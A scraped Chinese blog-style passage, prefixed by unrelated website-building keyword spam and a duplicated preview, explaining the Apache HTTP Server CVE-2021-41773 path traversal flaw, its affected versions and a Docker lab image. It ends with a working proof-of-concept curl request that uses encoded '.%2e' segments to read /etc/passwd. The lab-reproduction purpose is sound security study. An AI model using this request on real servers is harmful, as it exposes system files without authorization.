it网站建设方案,免费个人网站建站能上传视频吗,wordpress翻页代码,广州网站建设技术外包目录 四、Apache
4.1 CVE-2021-41773
漏洞简介
影响版本
环境搭建
漏洞复现 四、Apache
4.1 CVE-2021-41773
Apache HTTP Server 路径穿越漏洞
漏洞简介
该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录Directory/Require all gra…目录 四、Apache
4.1 CVE-2021-41773
漏洞简介
影响版本
环境搭建
漏洞复现 四、Apache
4.1 CVE-2021-41773
Apache HTTP Server 路径穿越漏洞
漏洞简介
该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录Directory/Require all granted/Directory允许被访问的的情况下(默认开启)攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件在服务端开启了gi或cgid这两个mod的情况下这个路径穿越漏洞将可以执行任意cgi命令(RCE)。
影响版本
Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid 漏洞复现
1.使用poc
curl http://IP:PORT/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
